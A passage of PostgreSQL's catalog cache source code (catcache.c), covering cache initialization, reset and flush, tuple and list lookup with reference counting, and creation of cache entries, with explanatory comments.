												   ALLOCSET_DEFAULT_MAXSIZE);
}


/*
 *		AtEOXact_CatCache
 *
 * Clean up catcaches at end of main transaction (either commit or abort)
 *
 * As of PostgreSQL 8.1, catcache pins should get released by the
 * ResourceOwner mechanism.  This routine is just a debugging
 * cross-check that no pins remain.
 */
void
AtEOXact_CatCache(bool isCommit)
{
#ifdef USE_ASSERT_CHECKING
	if (assert_enabled)
	{
		slist_iter	cache_iter;

		slist_foreach(cache_iter, &CacheHdr->ch_caches)
		{
			CatCache   *ccp = slist_container(CatCache, cc_next, cache_iter.cur);
			dlist_iter	iter;
			int			i;

			/* Check CatCLists */
			dlist_foreach(iter, &ccp->cc_lists)
			{
				CatCList   *cl = dlist_container(CatCList, cache_elem, iter.cur);

				Assert(cl->cl_magic == CL_MAGIC);
				Assert(cl->refcount == 0);
				Assert(!cl->dead);
			}

			/* Check individual tuples */
			for (i = 0; i < ccp->cc_nbuckets; i++)
			{
				dlist_head *bucket = &ccp->cc_bucket[i];

				dlist_foreach(iter, bucket)
				{
					CatCTup    *ct = dlist_container(CatCTup, cache_elem, iter.cur);

					Assert(ct->ct_magic == CT_MAGIC);
					Assert(ct->refcount == 0);
					Assert(!ct->dead);
				}
			}
		}
	}
#endif
}

/*
 *		ResetCatalogCache
 *
 *		Reset one catalog cache to empty.
 *
 *		This is not very efficient if the target cache is nearly empty.
* However, it shouldn't need to be efficient; we don't invoke it often. */ static void ResetCatalogCache(CatCache *cache) { dlist_mutable_iter iter; int i; /* Remove each list in this cache, or at least mark it dead */ dlist_foreach_modify(iter, &cache->cc_lists) { CatCList *cl = dlist_container(CatCList, cache_elem, iter.cur); if (cl->refcount > 0) cl->dead = true; else CatCacheRemoveCList(cache, cl); } /* Remove each tuple in this cache, or at least mark it dead */ for (i = 0; i < cache->cc_nbuckets; i++) { dlist_head *bucket = &cache->cc_bucket[i]; dlist_foreach_modify(iter, bucket) { CatCTup *ct = dlist_container(CatCTup, cache_elem, iter.cur); if (ct->refcount > 0 || (ct->c_list && ct->c_list->refcount > 0)) { ct->dead = true; /* list, if any, was marked dead above */ Assert(ct->c_list == NULL || ct->c_list->dead); } else CatCacheRemoveCTup(cache, ct); #ifdef CATCACHE_STATS cache->cc_invals++; #endif } } } /* * ResetCatalogCaches * * Reset all caches when a shared cache inval event forces it */ void ResetCatalogCaches(void) { slist_iter iter; CACHE1_elog(DEBUG2, "ResetCatalogCaches called"); slist_foreach(iter, &CacheHdr->ch_caches) { CatCache *cache = slist_container(CatCache, cc_next, iter.cur); ResetCatalogCache(cache); } CACHE1_elog(DEBUG2, "end of ResetCatalogCaches call"); } /* * CatalogCacheFlushCatalog * * Flush all catcache entries that came from the specified system catalog. * This is needed after VACUUM FULL/CLUSTER on the catalog, since the * tuples very likely now have different TIDs than before. (At one point * we also tried to force re-execution of CatalogCacheInitializeCache for * the cache(s) on that catalog. This is a bad idea since it leads to all * kinds of trouble if a cache flush occurs while loading cache entries. * We now avoid the need to do it by copying cc_tupdesc out of the relcache, * rather than relying on the relcache to keep a tupdesc for us. Of course * this assumes the tupdesc of a cachable system table will not change...) 
 */
void
CatalogCacheFlushCatalog(Oid catId)
{
	slist_iter	iter;

	CACHE2_elog(DEBUG2, "CatalogCacheFlushCatalog called for %u", catId);

	slist_foreach(iter, &CacheHdr->ch_caches)
	{
		CatCache   *cache = slist_container(CatCache, cc_next, iter.cur);

		/* Does this cache store tuples of the target catalog? */
		if (cache->cc_reloid == catId)
		{
			/* Yes, so flush all its contents */
			ResetCatalogCache(cache);

			/* Tell inval.c to call syscache callbacks for this cache */
			CallSyscacheCallbacks(cache->id, 0);
		}
	}

	CACHE1_elog(DEBUG2, "end of CatalogCacheFlushCatalog call");
}

/*
 *		InitCatCache
 *
 *	This allocates and initializes a cache for a system catalog relation.
 *	Actually, the cache is only partially initialized to avoid opening the
 *	relation.  The relation will be opened and the rest of the cache
 *	structure initialized on the first access.
 */
#ifdef CACHEDEBUG
#define InitCatCache_DEBUG2 \
do { \
	elog(DEBUG2, "InitCatCache: rel=%u ind=%u id=%d nkeys=%d size=%d", \
		 cp->cc_reloid, cp->cc_indexoid, cp->id, \
		 cp->cc_nkeys, cp->cc_nbuckets); \
} while(0)
#else
#define InitCatCache_DEBUG2
#endif

CatCache *
InitCatCache(int id,
			 Oid reloid,
			 Oid indexoid,
			 int nkeys,
			 const int *key,
			 int nbuckets)
{
	CatCache   *cp;
	MemoryContext oldcxt;
	int			i;

	/*
	 * nbuckets is the number of hash buckets to use in this catcache.
	 * Currently we just use a hard-wired estimate of an appropriate size for
	 * each cache; maybe later make them dynamically resizable?
	 *
	 * nbuckets must be a power of two.  We check this via Assert rather than
	 * a full runtime check because the values will be coming from constant
	 * tables.
	 *
	 * If you're confused by the power-of-two check, see comments in
	 * bitmapset.c for an explanation.
	 */
	Assert(nbuckets > 0 && (nbuckets & -nbuckets) == nbuckets);

	/*
	 * first switch to the cache context so our allocations do not vanish at
	 * the end of a transaction
	 */
	if (!CacheMemoryContext)
		CreateCacheMemoryContext();

	oldcxt = MemoryContextSwitchTo(CacheMemoryContext);

	/*
	 * if first time through, initialize the cache group header
	 */
	if (CacheHdr == NULL)
	{
		CacheHdr = (CatCacheHeader *) palloc(sizeof(CatCacheHeader));
		slist_init(&CacheHdr->ch_caches);
		CacheHdr->ch_ntup = 0;
#ifdef CATCACHE_STATS
		/* set up to dump stats at backend exit */
		on_proc_exit(CatCachePrintStats, 0);
#endif
	}

	/*
	 * allocate a new cache structure
	 *
	 * Note: we rely on zeroing to initialize all the dlist headers correctly
	 * (the bucket array is allocated in the same palloc0 as the struct, via
	 * the trailing flexible-array-style layout).
	 */
	cp = (CatCache *) palloc0(sizeof(CatCache) + nbuckets * sizeof(dlist_head));

	/*
	 * initialize the cache's relation information for the relation
	 * corresponding to this cache, and initialize some of the new cache's
	 * other internal fields.  But don't open the relation yet.
	 */
	cp->id = id;
	cp->cc_relname = "(not known yet)";
	cp->cc_reloid = reloid;
	cp->cc_indexoid = indexoid;
	cp->cc_relisshared = false; /* temporary */
	cp->cc_tupdesc = (TupleDesc) NULL;	/* NULL means "not yet initialized" */
	cp->cc_ntup = 0;
	cp->cc_nbuckets = nbuckets;
	cp->cc_nkeys = nkeys;
	for (i = 0; i < nkeys; ++i)
		cp->cc_key[i] = key[i];

	/*
	 * new cache is initialized as far as we can go for now. print some
	 * debugging information, if appropriate.
	 */
	InitCatCache_DEBUG2;

	/*
	 * add completed cache to top of group header's list
	 */
	slist_push_head(&CacheHdr->ch_caches, &cp->cc_next);

	/*
	 * back to the old context before we return...
	 */
	MemoryContextSwitchTo(oldcxt);

	return cp;
}

/*
 *		CatalogCacheInitializeCache
 *
 * This function does final initialization of a catcache: obtain the tuple
 * descriptor and set up the hash and equality function links.  We assume
 * that the relcache entry can be opened at this point!
 */
#ifdef CACHEDEBUG
#define CatalogCacheInitializeCache_DEBUG1 \
	elog(DEBUG2, "CatalogCacheInitializeCache: cache @%p rel=%u", cache, \
		 cache->cc_reloid)

#define CatalogCacheInitializeCache_DEBUG2 \
do { \
		if (cache->cc_key[i] > 0) { \
			elog(DEBUG2, "CatalogCacheInitializeCache: load %d/%d w/%d, %u", \
				i+1, cache->cc_nkeys, cache->cc_key[i], \
				 tupdesc->attrs[cache->cc_key[i] - 1]->atttypid); \
		} else { \
			elog(DEBUG2, "CatalogCacheInitializeCache: load %d/%d w/%d", \
				i+1, cache->cc_nkeys, cache->cc_key[i]); \
		} \
} while(0)
#else
#define CatalogCacheInitializeCache_DEBUG1
#define CatalogCacheInitializeCache_DEBUG2
#endif

static void
CatalogCacheInitializeCache(CatCache *cache)
{
	Relation	relation;
	MemoryContext oldcxt;
	TupleDesc	tupdesc;
	int			i;

	CatalogCacheInitializeCache_DEBUG1;

	relation = heap_open(cache->cc_reloid, AccessShareLock);

	/*
	 * switch to the cache context so our allocations do not vanish at the end
	 * of a transaction
	 */
	Assert(CacheMemoryContext != NULL);

	oldcxt = MemoryContextSwitchTo(CacheMemoryContext);

	/*
	 * copy the relcache's tuple descriptor to permanent cache storage
	 */
	tupdesc = CreateTupleDescCopyConstr(RelationGetDescr(relation));

	/*
	 * save the relation's name and relisshared flag, too (cc_relname is used
	 * only for debugging purposes)
	 */
	cache->cc_relname = pstrdup(RelationGetRelationName(relation));
	cache->cc_relisshared = RelationGetForm(relation)->relisshared;

	/*
	 * return to the caller's memory context and close the rel
	 */
	MemoryContextSwitchTo(oldcxt);

	heap_close(relation, AccessShareLock);

	CACHE3_elog(DEBUG2, "CatalogCacheInitializeCache: %s, %d keys",
				cache->cc_relname, cache->cc_nkeys);

	/*
	 * initialize cache's key information
	 */
	for (i = 0; i < cache->cc_nkeys; ++i)
	{
		Oid			keytype;
		RegProcedure eqfunc;

		CatalogCacheInitializeCache_DEBUG2;

		if (cache->cc_key[i] > 0)
			keytype = tupdesc->attrs[cache->cc_key[i] - 1]->atttypid;
		else
		{
			/* the only system column usable as a cache key is the OID */
			if (cache->cc_key[i] != ObjectIdAttributeNumber)
				elog(FATAL, "only sys attr supported in caches is OID");
			keytype = OIDOID;
		}

		GetCCHashEqFuncs(keytype,
						 &cache->cc_hashfunc[i],
						 &eqfunc);

		cache->cc_isname[i] = (keytype == NAMEOID);

		/*
		 * Do equality-function lookup (we assume this won't need a catalog
		 * lookup for any supported type)
		 */
		fmgr_info_cxt(eqfunc,
					  &cache->cc_skey[i].sk_func,
					  CacheMemoryContext);

		/* Initialize sk_attno suitably for HeapKeyTest() and heap scans */
		cache->cc_skey[i].sk_attno = cache->cc_key[i];

		/* Fill in sk_strategy as well --- always standard equality */
		cache->cc_skey[i].sk_strategy = BTEqualStrategyNumber;
		cache->cc_skey[i].sk_subtype = InvalidOid;
		/* Currently, there are no catcaches on collation-aware data types */
		cache->cc_skey[i].sk_collation = InvalidOid;

		CACHE4_elog(DEBUG2, "CatalogCacheInitializeCache %s %d %p",
					cache->cc_relname,
					i,
					cache);
	}

	/*
	 * mark this cache fully initialized
	 *
	 * (cc_tupdesc is assigned last deliberately: its non-NULLness is what
	 * other routines test to decide whether initialization is needed.)
	 */
	cache->cc_tupdesc = tupdesc;
}

/*
 * InitCatCachePhase2 -- external interface for CatalogCacheInitializeCache
 *
 * One reason to call this routine is to ensure that the relcache has
 * created entries for all the catalogs and indexes referenced by catcaches.
 * Therefore, provide an option to open the index as well as fixing the
 * cache itself.  An exception is the indexes on pg_am, which we don't use
 * (cf. IndexScanOK).
 */
void
InitCatCachePhase2(CatCache *cache, bool touch_index)
{
	if (cache->cc_tupdesc == NULL)
		CatalogCacheInitializeCache(cache);

	if (touch_index &&
		cache->id != AMOID &&
		cache->id != AMNAME)
	{
		Relation	idesc;

		/*
		 * We must lock the underlying catalog before opening the index to
		 * avoid deadlock, since index_open could possibly result in reading
		 * this same catalog, and if anyone else is exclusive-locking this
		 * catalog and index they'll be doing it in that order.
		 */
		LockRelationOid(cache->cc_reloid, AccessShareLock);
		idesc = index_open(cache->cc_indexoid, AccessShareLock);
		/* we only needed to force the relcache entry to exist */
		index_close(idesc, AccessShareLock);
		UnlockRelationOid(cache->cc_reloid, AccessShareLock);
	}
}


/*
 *		IndexScanOK
 *
 *		This function checks for tuples that will be fetched by
 *		IndexSupportInitialize() during relcache initialization for
 *		certain system indexes that support critical syscaches.
 *		We can't use an indexscan to fetch these, else we'll get into
 *		infinite recursion.  A plain heap scan will work, however.
 *		Once we have completed relcache initialization (signaled by
 *		criticalRelcachesBuilt), we don't have to worry anymore.
 *
 *		Similarly, during backend startup we have to be able to use the
 *		pg_authid and pg_auth_members syscaches for authentication even if
 *		we don't yet have relcache entries for those catalogs' indexes.
 */
static bool
IndexScanOK(CatCache *cache, ScanKey cur_skey)
{
	switch (cache->id)
	{
		case INDEXRELID:

			/*
			 * Rather than tracking exactly which indexes have to be loaded
			 * before we can use indexscans (which changes from time to time),
			 * just force all pg_index searches to be heap scans until we've
			 * built the critical relcaches.
			 */
			if (!criticalRelcachesBuilt)
				return false;
			break;

		case AMOID:
		case AMNAME:

			/*
			 * Always do heap scans in pg_am, because it's so small there's
			 * not much point in an indexscan anyway.  We *must* do this when
			 * initially building critical relcache entries, but we might as
			 * well just always do it.
			 */
			return false;

		case AUTHNAME:
		case AUTHOID:
		case AUTHMEMMEMROLE:

			/*
			 * Protect authentication lookups occurring before relcache has
			 * collected entries for shared indexes.
			 */
			if (!criticalSharedRelcachesBuilt)
				return false;
			break;

		default:
			break;
	}

	/* Normal case, allow index scan */
	return true;
}

/*
 *	SearchCatCache
 *
 *		This call searches a system cache for a tuple, opening the relation
 *		if necessary (on the first access to a particular cache).
 *		The result is NULL if not found, or a pointer to a HeapTuple in
 *		the cache.  The caller must not modify the tuple, and must call
 *		ReleaseCatCache() when done with it.
 *
 * The search key values should be expressed as Datums of the key columns'
 * datatype(s).  (Pass zeroes for any unused parameters.)  As a special
 * exception, the passed-in key for a NAME column can be just a C string;
 * the caller need not go to the trouble of converting it to a fully
 * null-padded NAME.
 */
HeapTuple
SearchCatCache(CatCache *cache,
			   Datum v1,
			   Datum v2,
			   Datum v3,
			   Datum v4)
{
	ScanKeyData cur_skey[CATCACHE_MAXKEYS];
	uint32		hashValue;
	Index		hashIndex;
	dlist_iter	iter;
	dlist_head *bucket;
	CatCTup    *ct;
	Relation	relation;
	SysScanDesc scandesc;
	HeapTuple	ntp;

	/*
	 * one-time startup overhead for each cache
	 */
	if (cache->cc_tupdesc == NULL)
		CatalogCacheInitializeCache(cache);

#ifdef CATCACHE_STATS
	cache->cc_searches++;
#endif

	/*
	 * initialize the search key information
	 */
	memcpy(cur_skey, cache->cc_skey, sizeof(cur_skey));
	cur_skey[0].sk_argument = v1;
	cur_skey[1].sk_argument = v2;
	cur_skey[2].sk_argument = v3;
	cur_skey[3].sk_argument = v4;

	/*
	 * find the hash bucket in which to look for the tuple
	 */
	hashValue = CatalogCacheComputeHashValue(cache, cache->cc_nkeys, cur_skey);
	hashIndex = HASH_INDEX(hashValue, cache->cc_nbuckets);

	/*
	 * scan the hash bucket until we find a match or exhaust our tuples
	 *
	 * Note: it's okay to use dlist_foreach here, even though we modify the
	 * dlist within the loop, because we don't continue the loop afterwards.
	 */
	bucket = &cache->cc_bucket[hashIndex];
	dlist_foreach(iter, bucket)
	{
		bool		res;

		ct = dlist_container(CatCTup, cache_elem, iter.cur);

		if (ct->dead)
			continue;			/* ignore dead entries */

		if (ct->hash_value != hashValue)
			continue;			/* quickly skip entry if wrong hash val */

		/*
		 * see if the cached tuple matches our key.
		 * (HeapKeyTest is a macro; it sets res rather than returning it.)
		 */
		HeapKeyTest(&ct->tuple,
					cache->cc_tupdesc,
					cache->cc_nkeys,
					cur_skey,
					res);
		if (!res)
			continue;

		/*
		 * We found a match in the cache.  Move it to the front of the list
		 * for its hashbucket, in order to speed subsequent searches.  (The
		 * most frequently accessed elements in any hashbucket will tend to be
		 * near the front of the hashbucket's list.)
		 */
		dlist_move_head(bucket, &ct->cache_elem);

		/*
		 * If it's a positive entry, bump its refcount and return it. If it's
		 * negative, we can report failure to the caller.
		 */
		if (!ct->negative)
		{
			/* reserve resource-owner slot before bumping, so we can't leak */
			ResourceOwnerEnlargeCatCacheRefs(CurrentResourceOwner);
			ct->refcount++;
			ResourceOwnerRememberCatCacheRef(CurrentResourceOwner, &ct->tuple);

			CACHE3_elog(DEBUG2, "SearchCatCache(%s): found in bucket %d",
						cache->cc_relname, hashIndex);

#ifdef CATCACHE_STATS
			cache->cc_hits++;
#endif

			return &ct->tuple;
		}
		else
		{
			CACHE3_elog(DEBUG2, "SearchCatCache(%s): found neg entry in bucket %d",
						cache->cc_relname, hashIndex);

#ifdef CATCACHE_STATS
			cache->cc_neg_hits++;
#endif

			return NULL;
		}
	}

	/*
	 * Tuple was not found in cache, so we have to try to retrieve it directly
	 * from the relation.  If found, we will add it to the cache; if not
	 * found, we will add a negative cache entry instead.
	 *
	 * NOTE: it is possible for recursive cache lookups to occur while reading
	 * the relation --- for example, due to shared-cache-inval messages being
	 * processed during heap_open().  This is OK.  It's even possible for one
	 * of those lookups to find and enter the very same tuple we are trying to
	 * fetch here.	If that happens, we will enter a second copy of the tuple
	 * into the cache.	The first copy will never be referenced again, and
	 * will eventually age out of the cache, so there's no functional problem.
	 * This case is rare enough that it's not worth expending extra cycles to
	 * detect.
	 */
	relation = heap_open(cache->cc_reloid, AccessShareLock);

	scandesc = systable_beginscan(relation,
								  cache->cc_indexoid,
								  IndexScanOK(cache, cur_skey),
								  SnapshotNow,
								  cache->cc_nkeys,
								  cur_skey);

	ct = NULL;

	while (HeapTupleIsValid(ntp = systable_getnext(scandesc)))
	{
		ct = CatalogCacheCreateEntry(cache, ntp, hashValue, hashIndex,
									 false);
		/* immediately set the refcount to 1 */
		ResourceOwnerEnlargeCatCacheRefs(CurrentResourceOwner);
		ct->refcount++;
		ResourceOwnerRememberCatCacheRef(CurrentResourceOwner, &ct->tuple);
		break;					/* assume only one match */
	}

	systable_endscan(scandesc);

	heap_close(relation, AccessShareLock);

	/*
	 * If tuple was not found, we need to build a negative cache entry
	 * containing a fake tuple.  The fake tuple has the correct key columns,
	 * but nulls everywhere else.
	 *
	 * In bootstrap mode, we don't build negative entries, because the cache
	 * invalidation mechanism isn't alive and can't clear them if the tuple
	 * gets created later.	(Bootstrap doesn't do UPDATEs, so it doesn't need
	 * cache inval for that.)
	 */
	if (ct == NULL)
	{
		if (IsBootstrapProcessingMode())
			return NULL;

		ntp = build_dummy_tuple(cache, cache->cc_nkeys, cur_skey);
		ct = CatalogCacheCreateEntry(cache, ntp, hashValue, hashIndex,
									 true);
		heap_freetuple(ntp);

		CACHE4_elog(DEBUG2, "SearchCatCache(%s): Contains %d/%d tuples",
					cache->cc_relname, cache->cc_ntup, CacheHdr->ch_ntup);
		CACHE3_elog(DEBUG2, "SearchCatCache(%s): put neg entry in bucket %d",
					cache->cc_relname, hashIndex);

		/*
		 * We are not returning the negative entry to the caller, so leave its
		 * refcount zero.
		 */

		return NULL;
	}

	CACHE4_elog(DEBUG2, "SearchCatCache(%s): Contains %d/%d tuples",
				cache->cc_relname, cache->cc_ntup, CacheHdr->ch_ntup);
	CACHE3_elog(DEBUG2, "SearchCatCache(%s): put in bucket %d",
				cache->cc_relname, hashIndex);

#ifdef CATCACHE_STATS
	cache->cc_newloads++;
#endif

	return &ct->tuple;
}

/*
 *	ReleaseCatCache
 *
 *	Decrement the reference count of a catcache entry (releasing the
 *	hold grabbed by a successful SearchCatCache).
 *
 *	NOTE: if compiled with -DCATCACHE_FORCE_RELEASE then catcache entries
 *	will be freed as soon as their refcount goes to zero.  In combination
 *	with aset.c's CLOBBER_FREED_MEMORY option, this provides a good test
 *	to catch references to already-released catcache entries.
 */
void
ReleaseCatCache(HeapTuple tuple)
{
	/*
	 * The caller only holds a pointer to the embedded HeapTuple; recover
	 * the containing CatCTup by subtracting the field offset.
	 */
	CatCTup    *ct = (CatCTup *) (((char *) tuple) -
								  offsetof(CatCTup, tuple));

	/* Safety checks to ensure we were handed a cache entry */
	Assert(ct->ct_magic == CT_MAGIC);
	Assert(ct->refcount > 0);

	ct->refcount--;
	ResourceOwnerForgetCatCacheRef(CurrentResourceOwner, &ct->tuple);

	/*
	 * Normally an entry is physically removed here only if it was marked
	 * dead by an invalidation while pinned; under CATCACHE_FORCE_RELEASE
	 * the ct->dead test is compiled out, so every unpin frees the entry.
	 */
	if (
#ifndef CATCACHE_FORCE_RELEASE
		ct->dead &&
#endif
		ct->refcount == 0 &&
		(ct->c_list == NULL || ct->c_list->refcount == 0))
		CatCacheRemoveCTup(ct->my_cache, ct);
}


/*
 *	GetCatCacheHashValue
 *
 *		Compute the hash value for a given set of search keys.
 *
 * The reason for exposing this as part of the API is that the hash value is
 * exposed in cache invalidation operations, so there are places outside the
 * catcache code that need to be able to compute the hash values.
 */
uint32
GetCatCacheHashValue(CatCache *cache,
					 Datum v1,
					 Datum v2,
					 Datum v3,
					 Datum v4)
{
	ScanKeyData cur_skey[CATCACHE_MAXKEYS];

	/*
	 * one-time startup overhead for each cache
	 */
	if (cache->cc_tupdesc == NULL)
		CatalogCacheInitializeCache(cache);

	/*
	 * initialize the search key information
	 */
	memcpy(cur_skey, cache->cc_skey, sizeof(cur_skey));
	cur_skey[0].sk_argument = v1;
	cur_skey[1].sk_argument = v2;
	cur_skey[2].sk_argument = v3;
	cur_skey[3].sk_argument = v4;

	/*
	 * calculate the hash value
	 */
	return CatalogCacheComputeHashValue(cache, cache->cc_nkeys, cur_skey);
}


/*
 *	SearchCatCacheList
 *
 *		Generate a list of all tuples matching a partial key (that is,
 *		a key specifying just the first K of the cache's N key columns).
 *
 *		The caller must not modify the list object or the pointed-to tuples,
 *		and must call ReleaseCatCacheList() when done with the list.
 */
CatCList *
SearchCatCacheList(CatCache *cache,
				   int nkeys,
				   Datum v1,
				   Datum v2,
				   Datum v3,
				   Datum v4)
{
	ScanKeyData cur_skey[CATCACHE_MAXKEYS];
	uint32		lHashValue;
	dlist_iter	iter;
	CatCList   *cl;
	CatCTup    *ct;
	List	   *volatile ctlist;	/* volatile: read again in PG_CATCH */
	ListCell   *ctlist_item;
	int			nmembers;
	bool		ordered;
	HeapTuple	ntp;
	MemoryContext oldcxt;
	int			i;

	/*
	 * one-time startup overhead for each cache
	 */
	if (cache->cc_tupdesc == NULL)
		CatalogCacheInitializeCache(cache);

	/* a list search must use strictly fewer keys than the cache defines */
	Assert(nkeys > 0 && nkeys < cache->cc_nkeys);

#ifdef CATCACHE_STATS
	cache->cc_lsearches++;
#endif

	/*
	 * initialize the search key information
	 */
	memcpy(cur_skey, cache->cc_skey, sizeof(cur_skey));
	cur_skey[0].sk_argument = v1;
	cur_skey[1].sk_argument = v2;
	cur_skey[2].sk_argument = v3;
	cur_skey[3].sk_argument = v4;

	/*
	 * compute a hash value of the given keys for faster search.  We don't
	 * presently divide the CatCList items into buckets, but this still lets
	 * us skip non-matching items quickly most of the time.
	 */
	lHashValue = CatalogCacheComputeHashValue(cache, nkeys, cur_skey);

	/*
	 * scan the items until we find a match or exhaust our list
	 *
	 * Note: it's okay to use dlist_foreach here, even though we modify the
	 * dlist within the loop, because we don't continue the loop afterwards.
	 */
	dlist_foreach(iter, &cache->cc_lists)
	{
		bool		res;

		cl = dlist_container(CatCList, cache_elem, iter.cur);

		if (cl->dead)
			continue;			/* ignore dead entries */

		if (cl->hash_value != lHashValue)
			continue;			/* quickly skip entry if wrong hash val */

		/*
		 * see if the cached list matches our key.
		 */
		if (cl->nkeys != nkeys)
			continue;
		HeapKeyTest(&cl->tuple,
					cache->cc_tupdesc,
					nkeys,
					cur_skey,
					res);
		if (!res)
			continue;

		/*
		 * We found a matching list.  Move the list to the front of the
		 * cache's list-of-lists, to speed subsequent searches.  (We do not
		 * move the members to the fronts of their hashbucket lists, however,
		 * since there's no point in that unless they are searched for
		 * individually.)
		 */
		dlist_move_head(&cache->cc_lists, &cl->cache_elem);

		/* Bump the list's refcount and return it */
		ResourceOwnerEnlargeCatCacheListRefs(CurrentResourceOwner);
		cl->refcount++;
		ResourceOwnerRememberCatCacheListRef(CurrentResourceOwner, cl);

		CACHE2_elog(DEBUG2, "SearchCatCacheList(%s): found list",
					cache->cc_relname);

#ifdef CATCACHE_STATS
		cache->cc_lhits++;
#endif

		return cl;
	}

	/*
	 * List was not found in cache, so we have to build it by reading the
	 * relation.  For each matching tuple found in the relation, use an
	 * existing cache entry if possible, else build a new one.
	 *
	 * We have to bump the member refcounts temporarily to ensure they won't
	 * get dropped from the cache while loading other members. We use a PG_TRY
	 * block to ensure we can undo those refcounts if we get an error before
	 * we finish constructing the CatCList.
	 */
	ResourceOwnerEnlargeCatCacheListRefs(CurrentResourceOwner);

	ctlist = NIL;

	PG_TRY();
	{
		Relation	relation;
		SysScanDesc scandesc;

		relation = heap_open(cache->cc_reloid, AccessShareLock);

		scandesc = systable_beginscan(relation,
									  cache->cc_indexoid,
									  IndexScanOK(cache, cur_skey),
									  SnapshotNow,
									  nkeys,
									  cur_skey);

		/* The list will be ordered iff we are doing an index scan */
		ordered = (scandesc->irel != NULL);

		while (HeapTupleIsValid(ntp = systable_getnext(scandesc)))
		{
			uint32		hashValue;
			Index		hashIndex;
			bool		found = false;
			dlist_head *bucket;

			/*
			 * See if there's an entry for this tuple already.
			 */
			ct = NULL;
			hashValue = CatalogCacheComputeTupleHashValue(cache, ntp);
			hashIndex = HASH_INDEX(hashValue, cache->cc_nbuckets);

			bucket = &cache->cc_bucket[hashIndex];
			dlist_foreach(iter, bucket)
			{
				ct = dlist_container(CatCTup, cache_elem, iter.cur);

				if (ct->dead || ct->negative)
					continue;	/* ignore dead and negative entries */

				if (ct->hash_value != hashValue)
					continue;	/* quickly skip entry if wrong hash val */

				if (!ItemPointerEquals(&(ct->tuple.t_self), &(ntp->t_self)))
					continue;	/* not same tuple */

				/*
				 * Found a match, but can't use it if it belongs to another
				 * list already
				 */
				if (ct->c_list)
					continue;

				found = true;
				break;			/* A-OK */
			}

			if (!found)
			{
				/* We didn't find a usable entry, so make a new one */
				ct = CatalogCacheCreateEntry(cache, ntp, hashValue, hashIndex,
											 false);
			}

			/* Careful here: add entry to ctlist, then bump its refcount */
			/* This way leaves state correct if lappend runs out of memory */
			ctlist = lappend(ctlist, ct);
			ct->refcount++;
		}

		systable_endscan(scandesc);

		heap_close(relation, AccessShareLock);

		/*
		 * Now we can build the CatCList entry.  First we need a dummy tuple
		 * containing the key values...
		 */
		ntp = build_dummy_tuple(cache, nkeys, cur_skey);
		oldcxt = MemoryContextSwitchTo(CacheMemoryContext);
		nmembers = list_length(ctlist);
		cl = (CatCList *)
			palloc(sizeof(CatCList) + nmembers * sizeof(CatCTup *));
		heap_copytuple_with_tuple(ntp, &cl->tuple);
		MemoryContextSwitchTo(oldcxt);
		heap_freetuple(ntp);

		/*
		 * We are now past the last thing that could trigger an elog before we
		 * have finished building the CatCList and remembering it in the
		 * resource owner.	So it's OK to fall out of the PG_TRY, and indeed
		 * we'd better do so before we start marking the members as belonging
		 * to the list.
		 */
	}
	PG_CATCH();
	{
		/* undo the temporary member refcounts taken above */
		foreach(ctlist_item, ctlist)
		{
			ct = (CatCTup *) lfirst(ctlist_item);
			Assert(ct->c_list == NULL);
			Assert(ct->refcount > 0);
			ct->refcount--;
			if (
#ifndef CATCACHE_FORCE_RELEASE
				ct->dead &&
#endif
				ct->refcount == 0 &&
				(ct->c_list == NULL || ct->c_list->refcount == 0))
				CatCacheRemoveCTup(cache, ct);
		}

		PG_RE_THROW();
	}
	PG_END_TRY();

	cl->cl_magic = CL_MAGIC;
	cl->my_cache = cache;
	cl->refcount = 0;			/* for the moment */
	cl->dead = false;
	cl->ordered = ordered;
	cl->nkeys = nkeys;
	cl->hash_value = lHashValue;
	cl->n_members = nmembers;

	i = 0;
	foreach(ctlist_item, ctlist)
	{
		cl->members[i++] = ct = (CatCTup *) lfirst(ctlist_item);
		Assert(ct->c_list == NULL);
		ct->c_list = cl;
		/* release the temporary refcount on the member */
		Assert(ct->refcount > 0);
		ct->refcount--;
		/* mark list dead if any members already dead */
		if (ct->dead)
			cl->dead = true;
	}
	Assert(i == nmembers);

	dlist_push_head(&cache->cc_lists, &cl->cache_elem);

	/* Finally, bump the list's refcount and return it */
	cl->refcount++;
	ResourceOwnerRememberCatCacheListRef(CurrentResourceOwner, cl);

	CACHE3_elog(DEBUG2, "SearchCatCacheList(%s): made list of %d members",
				cache->cc_relname, nmembers);

	return cl;
}

/*
 *	ReleaseCatCacheList
 *
 *	Decrement the reference count of a catcache list.
 */
void
ReleaseCatCacheList(CatCList *list)
{
	/* Safety checks to ensure we were handed a cache entry */
	Assert(list->cl_magic == CL_MAGIC);
	Assert(list->refcount > 0);
	list->refcount--;
	ResourceOwnerForgetCatCacheListRef(CurrentResourceOwner, list);

	/* physically remove only if marked dead (or under FORCE_RELEASE) */
	if (
#ifndef CATCACHE_FORCE_RELEASE
		list->dead &&
#endif
		list->refcount == 0)
		CatCacheRemoveCList(list->my_cache, list);
}


/*
 *	CatalogCacheCreateEntry
 *		Create a new CatCTup entry, copying the given HeapTuple and other
 *		supplied data into it.	The new entry initially has refcount 0.
 */
static CatCTup *
CatalogCacheCreateEntry(CatCache *cache, HeapTuple ntp,
                        uint32 hashValue, Index hashIndex, bool negative)
{
    CatCTup    *ct;
    HeapTuple   dtp;
    MemoryContext oldcxt;

    /*
     * If there are any out-of-line toasted fields in the tuple, expand them
     * in-line.  This saves cycles during later use of the catcache entry, and
     * also protects us against the possibility of the toast tuples being
     * freed before we attempt to fetch them, in case of something using a
     * slightly stale catcache entry.
     */
    if (HeapTupleHasExternal(ntp))
        dtp = toast_flatten_tuple(ntp, cache->cc_tupdesc);
    else
        dtp = ntp;

    /*
     * Allocate CatCTup header in cache memory, and copy the tuple there too.
     * Both must live in CacheMemoryContext so they outlive the calling query.
     */
    oldcxt = MemoryContextSwitchTo(CacheMemoryContext);
    ct = (CatCTup *) palloc(sizeof(CatCTup));
    heap_copytuple_with_tuple(dtp, &ct->tuple);
    MemoryContextSwitchTo(oldcxt);

    /* free the flattened copy only if we actually made one above */
    if (dtp != ntp)
        heap_freetuple(dtp);

    /*
     * Finish initializing the CatCTup header, and add it to the cache's
     * linked list and counts.
     */
    ct->ct_magic = CT_MAGIC;
    ct->my_cache = cache;
    ct->c_list = NULL;
    ct->refcount = 0;           /* for the moment */
    ct->dead = false;
    ct->negative = negative;
    ct->hash_value = hashValue;

    /* new entry becomes the most-recently-used member of its hash bucket */
    dlist_push_head(&cache->cc_bucket[hashIndex], &ct->cache_elem);

    cache->cc_ntup++;
    CacheHdr->ch_ntup++;

    return ct;
}

/*
 * build_dummy_tuple
